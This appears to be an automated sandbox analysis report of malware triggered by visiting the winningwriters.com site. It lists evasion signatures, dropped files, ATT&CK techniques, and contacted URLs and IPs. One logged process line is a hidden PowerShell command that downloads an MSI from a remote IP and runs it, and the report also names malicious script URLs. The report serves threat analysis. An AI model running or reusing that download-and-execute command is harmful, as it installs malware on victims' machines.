          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeAPI/Special instruction interceptor: Address: 6C247C44
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeAPI/Special instruction interceptor: Address: 6C4E7C44
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeAPI/Special instruction interceptor: Address: 6C4E7945
          Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C4E3B54
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8989Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 895Jump to behavior
          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 447Jump to behavior
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Initiate\python27.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Initiate\msvcr90.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\ServiceAlt\msvcr90.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\ServiceAlt\python27.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 848Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1176Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
          Source: cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
          Source: 59ef9e.msi.20.drBinary or memory string: vMcIYP(l0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Initiate\pyexec.exe "C:\Users\user\AppData\Local\Initiate\pyexec.exe"Jump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeNtQuerySystemInformation: Direct from: 0x401CF4Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeNtSetInformationThread: Direct from: 0x6BF02315Jump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeNtProtectVirtualMemory: Direct from: 0x776D7B2EJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeNtSetInformationThread: Direct from: 0x6BF22315Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\users\public\2as.msi" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Drive-by Compromise
          1
          PowerShell
          1
          Registry Run Keys / Startup Folder
          112
          Process Injection
          11
          Masquerading
          OS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomains1
          Replication Through Removable Media
          Scheduled Task/Job1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          1
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Registry Run Keys / Startup Folder
          21
          Virtualization/Sandbox Evasion
          Security Account Manager21
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          112
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture4
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Abuse Elevation Control Mechanism
          LSA Secrets11
          Peripheral Device Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Obfuscated Files or Information
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Software Packing
          DCSync112
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          File Deletion
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1557996 URL: http://winningwriters.com Startdate: 18/11/2024 Architecture: WINDOWS Score: 76 79 Antivirus detection for URL or domain 2->79 81 Yara detected UAC Bypass using CMSTP 2->81 83 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->83 9 msiexec.exe 79 39 2->9         started        12 pyexec.exe 1 2->12         started        15 cmd.exe 1 2->15         started        17 2 other processes 2->17 process3 dnsIp4 53 C:\Users\user\AppData\Local\...\pyexec.exe, PE32 9->53 dropped 55 C:\Users\user\AppData\Local\...\python27.dll, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\...\msvcr90.dll, PE32 9->57 dropped 20 pyexec.exe 6 9->20         started        91 Maps a DLL or memory area into another process 12->91 93 Found direct / indirect Syscall (likely to bypass EDR) 12->93 24 cmd.exe 4 12->24         started        95 Suspicious powershell command line found 15->95 26 powershell.exe 18 12 15->26         started        29 conhost.exe 15->29         started        59 127.0.0.1 unknown unknown 17->59 61 192.168.2.16, 443, 49699, 49700 unknown unknown 17->61 63 239.255.255.250 unknown Reserved 17->63 31 chrome.exe 17->31         started        file5 signatures6 process7 dnsIp8 47 C:\Users\user\AppData\Roaming\...\pyexec.exe, PE32 20->47 dropped 49 C:\Users\user\AppData\...\python27.dll, PE32 20->49 dropped 51 C:\Users\user\AppData\Roaming\...\msvcr90.dll, PE32 20->51 dropped 85 Switches to a custom stack to bypass stack traces 20->85 87 Found direct / indirect Syscall (likely to bypass EDR) 20->87 33 pyexec.exe 1 20->33         started        36 conhost.exe 24->36         started        65 193.188.22.73, 49940, 80 LIVECOMM-ASRespublikanskayastr3k6RU Russian Federation 26->65 38 conhost.exe 26->38         started        40 msiexec.exe 3 26->40         started        67 premiumserviceads.com 94.141.120.12, 443, 49835 UNITLINE_RST_NET1RostovnaDonuRU Russian Federation 31->67 69 s.twitter.com 104.244.42.67, 443, 49806, 49829 TWITTERUS United States 31->69 71 40 other IPs or domains 31->71 file9 signatures10 process11 signatures12 73 Maps a DLL or memory area into another process 33->73 75 Switches to a custom stack to bypass stack traces 33->75 77 Found direct / indirect Syscall (likely to bypass EDR) 33->77 42 cmd.exe 1 33->42         started        process13 signatures14 89 Switches to a custom stack to bypass stack traces 42->89 45 conhost.exe 42->45         started        process15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          http://winningwriters.com0%Avira URL Cloudsafe
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Initiate\msvcr90.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Initiate\pyexec.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Initiate\python27.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\ServiceAlt\msvcr90.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe0%ReversingLabs
          C:\Users\user\AppData\Roaming\ServiceAlt\python27.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://winningwriters.com/graphics/tomstory/tom_story_wide_banner_2025.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/seal-transparent-25x40-2019.png0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/tompoetry/burton_slide_show.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/jquery-ck.js0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/tompoetry/hagen_slide_show.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.png0%Avira URL Cloudsafe
          http://193.188.22.73/a.m100%Avira URL Cloudmalware
          https://bcbshieldn.com/cflaer.js100%Avira URL Cloudmalware
          https://winningwriters.com/assets/js/ga-track.js0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/social-sprite-2020_new.png0%Avira URL Cloudsafe
          http://responsive-nav.com0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/slideshow-pager.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/css/style.css0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/pageslide.js0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/logo@2x.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/search.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/hoverintent.js0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/slidecontrols.png0%Avira URL Cloudsafe
          https://winningwriters.com//assets/images/insta_heart.png0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/wergle/garnham_home_page_slide_a.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/tomstory/mcnamara_home_page_slide.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/assets/fancybox/jquery.fancybox.pack.js0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/lion-mobile.png0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/advertising/origin_story_banner_for_ww_2408.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/wergle/wergle_2024_top_banner_970_250.jpg0%Avira URL Cloudsafe
          http://winningwriters.com/0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/tomstory/liu_home_page_slide.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/social-sprite-2020.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/device.min.js0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/jquery.matchHeight-min.js0%Avira URL Cloudsafe
          https://winningwriters.com/graphics/home_page_slide_victor.jpg0%Avira URL Cloudsafe
          https://winningwriters.com/assets/fancybox/fancybox_sprite.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/feed.js0%Avira URL Cloudsafe
          https://winningwriters.com/assets/images/winningwriters.ico0%Avira URL Cloudsafe
          https://winningwriters.com/assets/css/responsive-nav-styles.css0%Avira URL Cloudsafe
          http://viljamis.com0%Avira URL Cloudsafe
          https://winningwriters.com/assets/fancybox/fancybox_overlay.png0%Avira URL Cloudsafe
          https://winningwriters.com/assets/fancybox/jquery.fancybox.css0%Avira URL Cloudsafe
          http://www.thecssninja.com/javascript/handleevent0%Avira URL Cloudsafe
          https://winningwriters.com/assets/js/responsiveslides.js0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          star-mini.c10r.facebook.com
          157.240.0.35
          truefalse
            high
            premiumserviceads.com
            94.141.120.12
            truefalse
              unknown
              google.com
              142.250.185.110
              truefalse
                high
                s.twitter.com
                104.244.42.67
                truefalse
                  high
                  scontent-ord5-1.cdninstagram.com
                  157.240.249.63
                  truefalse
                    high
                    cta.berlmember.com
                    103.52.144.214
                    truefalse
                      high
                      platform.twitter.map.fastly.net
                      146.75.120.157
                      truefalse
                        high
                        stats.g.doubleclick.net
                        173.194.76.157
                        truefalse
                          high
                          bcbshieldn.com
                          188.114.97.3
                          truefalse
                            high
                            dualstack.reddit.map.fastly.net
                            151.101.193.140
                            truefalse
                              high
                              scontent.xx.fbcdn.net
                              157.240.0.6
                              truefalse
                                high
                                analytics-alv.google.com
                                216.239.34.181
                                truefalse
                                  high
                                  t.co
                                  162.159.140.229
                                  truefalse
                                    high
                                    code.jquery.com
                                    151.101.66.137
                                    truefalse
                                      high
                                      googleads.g.doubleclick.net
                                      142.250.186.162
                                      truefalse
                                        high
                                        reddit.map.fastly.net
                                        151.101.65.140
                                        truefalse
                                          high
                                          winningwriters.com
                                          66.33.207.42
                                          truefalse
                                            high
                                            www.google.com
                                            172.217.16.132
                                            truefalse
                                              high
                                              td.doubleclick.net
                                              142.250.185.130
                                              truefalse
                                                high
                                                analytics.google.com
                                                142.250.185.174
                                                truefalse
                                                  high
                                                  alb.reddit.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    static.ads-twitter.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      www.facebook.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        www.redditstatic.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          s7.addthis.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            w3-reporting-nel.reddit.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              connect.facebook.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                analytics.twitter.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  pixel-config.reddit.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    NameMaliciousAntivirus DetectionReputation
                                                                    https://winningwriters.com/graphics/tompoetry/burton_slide_show.jpgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://scontent-ord5-1.cdninstagram.com/v/t51.2885-15/466498990_932073868801787_4615250428975556945_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=K2QYvU4QDFwQ7kNvgHexzPp&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYB6H6C6vXmQz4o0NOzYmapDE6_aoksGSCqZ4e0xcfBfbw&oe=6741529Cfalse
                                                                      high
                                                                      https://pixel-config.reddit.com/pixels/t2_11an1ubt/configfalse
                                                                        high
                                                                        https://winningwriters.com/graphics/tomstory/tom_story_wide_banner_2025.pngfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960090650&cd[buttonFeatures]=%7B%22classList%22%3A%22button%20active%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22doneBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Done%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Done&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=2&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=FGETfalse
                                                                          high
                                                                          https://www.facebook.com/tr/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=GETfalse
                                                                            high
                                                                            https://www.redditstatic.com/ads/pixel.jsfalse
                                                                              high
                                                                              https://winningwriters.com/false
                                                                                unknown
                                                                                https://winningwriters.com/assets/js/jquery-ck.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://w3-reporting-nel.reddit.com/reportsfalse
                                                                                  high
                                                                                  https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-216038-1&cid=723902191.1731960008&jid=878809402&gjid=1037938329&_gid=1788557778.1731960008&_u=YGBAgEABAAAAAGAAI~&z=1716026079false
                                                                                    high
                                                                                    http://193.188.22.73/a.mtrue
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://winningwriters.com/graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.pngfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://winningwriters.com/assets/images/seal-transparent-25x40-2019.pngfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://scontent-ord5-1.cdninstagram.com/v/t51.2885-15/467112998_3886836521643779_8605725034765016710_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=18de74&_nc_ohc=_cdycnS1RYQQ7kNvgEJjUe2&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYDPIeUcR1p4zvzbgpOdfbp9YsIY1oSApIPk7ope3-S9-Q&oe=674157ACfalse
                                                                                      high
                                                                                      https://connect.facebook.net/en_US/fbevents.jsfalse
                                                                                        high
                                                                                        https://winningwriters.com/graphics/tompoetry/hagen_slide_show.jpgfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://winningwriters.com/assets/js/ga-track.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://bcbshieldn.com/cflaer.jsfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=FGETfalse
                                                                                          high
                                                                                          https://winningwriters.com/assets/images/social-sprite-2020_new.pngfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_11an1ubt_telemetryfalse
                                                                                            high
                                                                                            https://winningwriters.com/assets/css/style.cssfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://winningwriters.com/assets/images/slideshow-pager.pngfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://winningwriters.com/assets/js/pageslide.jsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://alb.reddit.com/rp.gif?ts=1731960007980&id=t2_11an1ubt&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=814805a2-007a-47c4-a129-ea0a72736646&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc=false
                                                                                              high
                                                                                              https://analytics.twitter.com/i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31false
                                                                                                high
